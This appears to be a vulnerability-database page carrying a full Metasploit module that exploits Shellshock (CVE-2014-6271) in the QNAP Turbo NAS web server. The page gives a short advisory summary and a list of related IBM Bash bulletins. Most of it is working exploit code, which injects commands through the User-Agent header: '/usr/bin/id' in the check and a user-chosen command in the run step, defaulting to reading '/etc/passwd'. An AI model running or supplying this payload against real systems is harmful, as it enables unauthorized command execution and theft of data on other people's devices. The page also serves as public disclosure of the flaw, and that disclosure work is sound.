QNAP Web Server Remote Code Execution

🗓️ 27 Mar 2015 00:00:00Reported by Patrick PellegrinoType

packetstorm🔗 packetstormsecurity.com👁 109 Views

QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection allows injecting Unix command with the same user who runs the http service on QNAP system. Affected products include all Turbo NAS models except TS-100, TS-101, TS-200. Exploit tested on TS-1279U-RP.

Reporter	Title	Published	Views	Family All 474
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	15 Jun 201807:01	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance	17 Jun 201822:30	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	19 Jul 202000:49	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	31 Jan 201901:35	–	ibm
IBM Security Bulletins	Security Bulletins for IBM Tealeaf Customer Experience offerings	16 Jun 201819:35	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Jun 201800:08	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	16 Jun 201813:58	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Oct 201903:50	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)	31 Jan 201901:30	–	ibm
IBM Security Bulletins	Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)	15 Sep 202112:14	–	ibm

`# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection  
# Date: 7 February 2015  
# Exploit Author: Patrick Pellegrino | [email protected] [work] / [email protected] [other]  
# Employer homepage: http://www.securegroup.it  
# Vendor homepage: http://www.qnap.com  
# Version: All Turbo NAS models except TS-100, TS-101, TS-200  
# Tested on: TS-1279U-RP  
# CVE : 2014-6271  
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61  
  
  
##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/d3vpp/metasploit-modules  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',  
'Description' => %q{  
This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.  
Affected products:  
All Turbo NAS models except TS-100, TS-101, TS-200  
},  
'Author' => ['Patrick Pellegrino'], # Metasploit module | [email protected] [work] / [email protected] [other]  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2014-6271'], #aka ShellShock  
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']  
],  
'Platform' => ['unix']  
))  
  
register_options([  
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),  
OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])  
], self.class)  
end  
  
def check  
begin  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path),  
'agent' => "() { :;}; echo; /usr/bin/id"  
})  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE  
vprint_error("Connection failed")  
return Exploit::CheckCode::Unknown  
end  
  
if !res  
return Exploit::CheckCode::Unknown  
elsif res.code== 302 and res.body.include? 'uid'  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
  
def run  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path),  
'agent' => "() { :;}; echo; #{datastore['CMD']}"  
})  
  
if res.body.empty?  
print_error("No data found.")  
elsif res.code== 302  
print_status("#{rhost}:#{rport} - bash env variable injected")  
puts " "  
print_line(res.body)  
end  
end  
  
end  
  
`

27 Mar 2015 00:00Current

10High risk

Vulners AI Score10

EPSS0.9422